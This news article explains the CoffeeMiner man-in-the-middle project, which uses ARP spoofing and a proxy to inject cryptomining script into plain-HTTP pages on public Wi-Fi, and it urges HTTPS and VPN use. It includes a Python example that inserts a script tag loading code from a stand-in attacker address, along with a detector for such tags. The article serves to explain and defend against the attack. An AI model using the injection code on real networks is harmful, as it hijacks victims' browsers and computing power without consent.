CoffeeMiner project lets you hack public Wi-Fi to mine cryptocoins – Naked Security
That’s where someone else uses your laptop, via your web browser, to perform a series of calculations that help to generate some sort of cryptocurrency, and keeps the proceeds for themselves.
We’re guessing that the provider figured it would be OK to “borrow” about 10 seconds of CPU time whenever someone connected to the Wi-Fi, presumably as a way of earning a few extra pennies in return for providing free internet access:
(Just for the record, the tweeter was wrong above, inasmuch as the code was mining Monero, not Bitcoin – but the sentiment was spot-on.)
Starbucks wasn’t amused, and “took swift action to ensure [the] internet provider resolved the issue”.
We’re guessing here, but we’re prepared to assume that this “swift action” involved a very brief phone call in a rather loud voice.
But it’s not only the Wi-Fi operator or the coffee shop owner that you need to worry about.
…anyone else in the coffee shop (or bus, or train, or hotel lounge, or wherever it is) at the same time can sniff out what you’re doing, and perhaps also trick you into seeing and doing something you didn’t expect.
Thanks to a “for academic purposes only” project called CoffeeMiner, rogues in your local cafe can now trick you into cryptomining, along with any other web-based cyberdodginess they might have in mind:
The project is the brainchild of a software developer from Barcelona who goes by the name Arnau Code, and if you overlook its potential for misuse (please read the disclaimer!), we think it’s a well put-together tutorial about Man-in-the-Middle (MitM) attacks.
If you’ve ever wondered why HTTPS (the padlock in your browser) really matters, and why every website really ought to use it instead of serving up content over plain old HTTP, you should read Arnau’s article. Don’t just take it from us that HTTPS is about more than secrecy. The CoffeeMiner project is a good reminder that HTTPS is about authenticity and tamper-resistance, too – getting the right stuff from the right place.
A MitM attack is where someone else on the network gets to see your network requests before they set off to their final destination, and can intercept the replies before they get back to you.
Instead of talking directly to the website you’re expecting, you are effectively talking through a middleman, who can alter what you ask for in the first place, and change what you see in reply.
In other words, every website you visit could, in theory, end up temporarily mining cryptocurrency for someone else.
Simply explained, CoffeeMiner:
- Uses ARP spoofing to trick your laptop into sending traffic meant for the access point (the network gateway) to the CoffeeMiner computer instead. The arpspoof tool from the open source dsniff toolkit is used for this part.
- Forwards all your other network traffic on untouched, so you don’t notice anything is wrong.
- Diverts your plain HTTP web traffic into a man-in-the-middle proxy. The open source toolkit mitmproxy is used here.
- Injects a single line of HTML into the web pages you receive.
The CoffeeMiner code doesn’t actually inject the coin-mining code directly; instead it injects a line like this:
The IP number and port (in this example, 192.0.2.42:8000) belong to a web server running on the CoffeeMiner laptop itself – in fact, it’s part of the CoffeeMiner toolkit – that serves up the actual cryptomining code of your choice. (Arnau Code chose the widely used CoinHive miner.)
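To make the injection step concrete, here is an added example (not CoffeeMiner’s own code, and not a mitmproxy addon) that does the same string-level edit a MitM proxy would make to a plain-HTTP reply, plus the check a defender would run from the victim’s side: flag any script tag whose source is a literal LAN address, which is exactly what a CoffeeMiner-style injection looks like. The sample page, the attacker address 192.0.2.42:8000 and the path /script.js are all constructed for the example.

```python
"""Injecting a <script> loader into plain-HTTP HTML, and spotting it afterwards."""
import ipaddress
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample page, standing in for an HTTP response body seen by the proxy.
# It already loads one legitimate script so the detector has something to ignore.
ORIGINAL_HTML = b"""<!doctype html>
<html><head><title>Menu</title>
<script src="https://cdn.example.com/app.js"></script></head>
<body><h1>Today's coffee</h1><p>Flat white, 3.50</p></body>
</html>"""

# Hypothetical attacker-side web server, as in the CoffeeMiner layout: the injected
# tag is only a loader; the actual mining code is fetched from this address.
INJECTED_SRC = "http://192.0.2.42:8000/script.js"

_BODY_CLOSE = re.compile(rb"</body\s*>", re.IGNORECASE)
_SCRIPT_SRC = re.compile(rb"<script[^>]*\ssrc\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)


def inject_script(headers: Dict[str, str], body: bytes, src: str) -> bytes:
    """Return body with one <script src=...> tag inserted before </body>.

    Mirrors what a response hook in a MitM proxy would do to an HTTP reply.
    Non-HTML responses (images, JSON, downloads) are passed through untouched,
    as is any page without a closing </body> tag.
    """
    ctype = headers.get("Content-Type", "").lower()
    if not ctype.startswith("text/html"):
        return body
    tag = b'<script src="%s"></script>' % src.encode("ascii")
    # count=1: inject exactly once, at the first closing body tag.
    new_body, n = _BODY_CLOSE.subn(tag + b"</body>", body, count=1)
    return new_body if n else body


def script_sources(body: bytes) -> List[str]:
    """All src attributes of <script> tags in an HTML body."""
    return [m.decode("latin-1") for m in _SCRIPT_SRC.findall(body)]


def is_lan_address(host: str) -> bool:
    """True if host is a literal IP in a private, link-local or loopback range.

    Hostnames return False: a real site loads scripts from names like
    cdn.example.com, not from a bare address on the local network.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_private or ip.is_link_local or ip.is_loopback


def suspicious_scripts(body: bytes) -> List[str]:
    """Script URLs that point at a LAN address: the CoffeeMiner tell-tale."""
    flagged = []
    for src in script_sources(body):
        host = urlsplit(src).hostname or ""
        if is_lan_address(host):
            flagged.append(src)
    return flagged


if __name__ == "__main__":
    headers = {"Content-Type": "text/html; charset=utf-8"}
    tampered = inject_script(headers, ORIGINAL_HTML, INJECTED_SRC)
    print("before:", suspicious_scripts(ORIGINAL_HTML))
    print("after: ", suspicious_scripts(tampered))
```

In a real proxy the `inject_script` call would sit in the response hook; the point of the `Content-Type` test is that blindly editing every response corrupts images and downloads, which would make the tampering obvious. The detector is deliberately narrow: it only catches scripts loaded from a literal LAN IP, which is the CoffeeMiner layout, not an attacker who proxies the miner through a public hostname.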
What to do?
This isn’t really a lesson about cryptomining, though that certainly adds to the intrigue.
The problem here is that on an untrusted network (and that means almost every network you’ll ever use these days, because it’s hard to vouch for every user and every device attached at any moment), a rogue user can very easily mess with any web traffic that isn’t encrypted using HTTPS.
Without HTTPS, there is no confidentiality, so anyone can see what you are doing and saying; there is no identification, so you have no idea who’s replying; and there is no integrity, because you can’t tell when someone has tampered with what you’ve just downloaded, for example by stuffing a coin-mining script into every web page.
As we mentioned at the start:
- Stick to sites that use HTTPS. If a MitM tries to tamper with an HTTPS connection, your browser will almost always warn you that the certificate doesn’t match and that you may be talking to an imposter server. (Plain HTTP gives you no such warning, which is why CoffeeMiner only targets it.)
- Urge sites that don’t yet use HTTPS to start doing so. It’s a little bit more work, but worth the effort.
- Use a VPN if your work provides one. This encrypts all your network traffic back to head office, not just your web browsing, so a rogue on the local network sees only an encrypted tunnel.
By the way, if you want to run a VPN at home, and you have a spare PC handy, why not try the Sophos XG Firewall Home Edition? You get a free licence for everything the product can do, including anti-virus, web filtering, email security, IPS, plus a fully-fledged VPN.